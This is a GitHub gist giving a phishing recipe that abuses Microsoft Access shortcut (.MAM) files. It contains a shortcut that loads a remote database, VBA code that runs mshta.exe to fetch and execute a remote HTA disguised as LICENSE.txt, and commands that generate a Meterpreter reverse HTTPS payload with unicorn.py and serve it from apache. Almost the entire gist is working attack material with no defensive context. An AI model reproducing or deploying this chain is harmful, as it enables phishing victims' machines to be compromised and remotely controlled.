Skip to content

Instantly share code, notes, and snippets.

@adon90
Last active July 4, 2018 13:08
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save adon90/0f2fee691511a759a240009097dcc956 to your computer and use it in GitHub Desktop.
Save adon90/0f2fee691511a759a240009097dcc956 to your computer and use it in GitHub Desktop.
Phishing Access Macroless .MAM Extension
------Database Shortcut--------
[Shortcut Properties]
AccessShortcutVersion=1
DatabaseName=Database3.accdb
ObjectName=pwnid
ObjectType=Macro
Computer=W10PTTEST
DatabasePath=http://IP/Database3.accde
EnableRemote=0
CreationTime= 1d4138fe237a9fc
Icon=265
--------------------
--------Macro inside Access--------
Public Function runme()
runcalculator
End Function
Sub runcalculator()
Shell ("mshta.exe http://IP/LICENSE.txt")
End Sub
--------------------------------------
----------Payload Prep---------
python unicorn.py windows/meterpreter/reverse_https 172.16.37.164 443 hta
cp hta_attack/Launcher.hta /var/www/html/LICENSE.txt
service apache2 start
---------------------------------------
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment